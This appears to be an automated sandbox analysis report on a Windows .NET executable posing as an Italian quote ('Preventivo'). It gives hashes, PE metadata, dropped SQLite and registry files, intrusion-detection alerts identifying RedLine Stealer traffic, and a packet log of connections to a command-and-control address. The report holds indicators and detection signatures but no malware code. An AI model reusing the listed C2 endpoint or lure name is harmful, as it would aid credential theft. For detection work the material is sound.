                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.416849385222646
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:Rcifpi6ceLPL9skLmb0mYSWSPtaJG8nAgex285i2MMhA20X4WABlGuNO5+:ui58YSWIZBk2MM6AFBMo
                                                                                      MD5:CB8D267E3E4C399F0C04CAF39A4EB72B
                                                                                      SHA1:D609BB75117D686618099041FC9099DC1ADE0BC8
                                                                                      SHA-256:5A10525B134CB94F9EE6897F1B1B18DF1569EAA64B860A835F0E9E9BAF2D76EE
                                                                                      SHA-512:49AFD3FA6A06E5CBC2B967127113E7E0271A9CA4E87FB84864FA46E830AB8F49DEB1CA08D33A63BB552A185402606FFC795C8476BD521C2F498B78CE5C4373FD
                                                                                      Malicious:false
                                                                                      Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.E..5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):5.266308927735255
                                                                                      TrID:
                                                                                      • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                      • Win64 Executable GUI (202006/5) 46.43%
                                                                                      • Win64 Executable (generic) (12005/4) 2.76%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                      • DOS Executable Generic (2002/1) 0.46%
                                                                                      File name:Preventivo#09678.exe
                                                                                      File size:1'583'745 bytes
                                                                                      MD5:761710e429b4487833e5f9695da7a981
                                                                                      SHA1:eb09e34e35e06d4fee5f01bf57124a80c0e61917
                                                                                      SHA256:82b00503241fb05e5891a11a701a6706fbe2319cffe309c16df7517cfe259011
                                                                                      SHA512:6f7f1cda60481e630af6d0db1c258e8715af3da24985b7d6221df728d2ad4b5f2d2e5dd41f8953033624d919a256b2340dacb4cd21985cb2202c7d4356f01b3b
                                                                                      SSDEEP:12288:RVNdpkuPuik2PwIxDzEtYmZN78Bdboror5Ing2:RXduzEIMzEtYm4BxUFh
                                                                                      TLSH:D275F0467E13AC17BD041A22E1D836FD06FE6D5B7CF0A64FCF5CAE9596662BC0064A30
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...J.5..........."...0..1............... ....@...... ....................................`................................
                                                                                      Icon Hash:443ad8d4dc581348
                                                                                      Entrypoint:0x400000
                                                                                      Entrypoint Section:
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0xB235CF4A [Sun Sep 28 23:42:02 2064 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:
                                                                                      Instruction
                                                                                      dec ebp
                                                                                      pop edx
                                                                                      nop
                                                                                      add byte ptr [ebx], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax+eax], al
                                                                                      add byte ptr [eax], al
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x10ea6.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x51740x1c.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x31900x3200c5fb7895b5eaf58ed2000fd33c4a2198False0.570078125data5.889642191118953IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x60000x10ea60x1100063818ce2ddf7dd759dac33b81b2bea19False0.06192555147058824data3.19703904663027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0x61440x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.05199337513308885
                                                                                      RT_GROUP_ICON0x1696c0x14data1.15
                                                                                      RT_VERSION0x169800x33cdata0.42995169082125606
                                                                                      RT_MANIFEST0x16cbc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-13T15:02:27.715629+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.749699193.70.111.18613484TCP
                                                                                      2024-11-13T15:02:32.758524+01002045000ET MALWARE RedLine Stealer - CheckConnect Response1193.70.111.18613484192.168.2.749699TCP
                                                                                      2024-11-13T15:02:33.019894+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.749699193.70.111.18613484TCP
                                                                                      2024-11-13T15:02:35.793333+01002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound1193.70.111.18613484192.168.2.749699TCP
                                                                                      2024-11-13T15:02:35.854568+01002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.749731193.70.111.18613484TCP
                                                                                      2024-11-13T15:02:36.873290+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.749730TCP
                                                                                      2024-11-13T15:02:37.850321+01002848200ETPRO MALWARE RedLine - GetUpdates Request1192.168.2.749744193.70.111.18613484TCP
                                                                                      2024-11-13T15:03:14.847087+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.749944TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 13, 2024 15:02:26.713265896 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:26.718746901 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:26.718823910 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:26.732788086 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:26.737740040 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:27.090814114 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:27.095949888 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:27.662338972 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:27.715629101 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:32.733220100 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:32.733220100 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:32.758523941 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:32.758537054 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:33.019684076 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:33.019705057 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:33.019716024 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:33.019893885 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:33.020136118 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:33.020209074 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.787724018 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.787996054 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.792977095 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.793205976 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.793333054 CET1348449699193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.793395042 CET4969913484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.795759916 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.795759916 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.800865889 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.800920010 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.800931931 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.800978899 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.801003933 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.801059961 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.801328897 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.801358938 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.801388025 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.801388025 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.801404953 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.801418066 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.801439047 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.801446915 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.801470995 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.801476002 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.801496029 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.801506042 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.801527023 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.801553011 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.806109905 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.806139946 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.806173086 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.806201935 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.806262970 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.806292057 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.806322098 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.806335926 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.806529045 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.806580067 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.806586981 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.806637049 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.806704998 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.806785107 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.854424000 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.854568005 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.902322054 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.905877113 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:35.958363056 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:35.958434105 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.010343075 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.010499954 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.058495998 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.058552027 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.110198975 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.110425949 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.158220053 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.158746004 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.206393003 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.206490993 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.254420042 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.254482985 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.302618980 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.305660963 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.354226112 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.354357004 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.376400948 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.376569033 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.376631975 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381462097 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381494999 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381521940 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381536007 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381548882 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381582975 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381583929 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381606102 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381628036 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381629944 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381653070 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381659031 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381679058 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381680965 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381715059 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381727934 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381742001 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381747007 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381756067 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381769896 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381778002 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381789923 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381798029 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381804943 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381819963 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381840944 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381840944 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381855965 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381865025 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381890059 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381894112 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381911039 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381932020 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381952047 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.381973028 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381983995 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.381988049 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382005930 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382009029 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382035017 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382046938 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382049084 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382070065 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382092953 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382097960 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382119894 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382122040 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382132053 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382143021 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382148027 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382164001 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382170916 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382185936 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382193089 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382206917 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382209063 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382215023 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382230043 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382235050 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382255077 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382262945 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382277012 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382296085 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382297039 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382328987 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382334948 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382358074 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382378101 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382380962 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382397890 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382397890 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382420063 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382422924 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382441044 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382447958 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382460117 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382462025 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382483006 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382486105 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382503033 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382505894 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382523060 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382529974 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382544041 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382546902 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382565022 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382575035 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382586956 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382586956 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382608891 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382612944 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382628918 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382639885 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382649899 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.382667065 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382682085 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.382692099 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.387537003 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.387650967 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.387907028 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.387988091 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.388008118 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.388044119 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.388061047 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:36.388065100 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.388086081 CET1348449731193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:36.388098001 CET4973113484192.168.2.7193.70.111.186
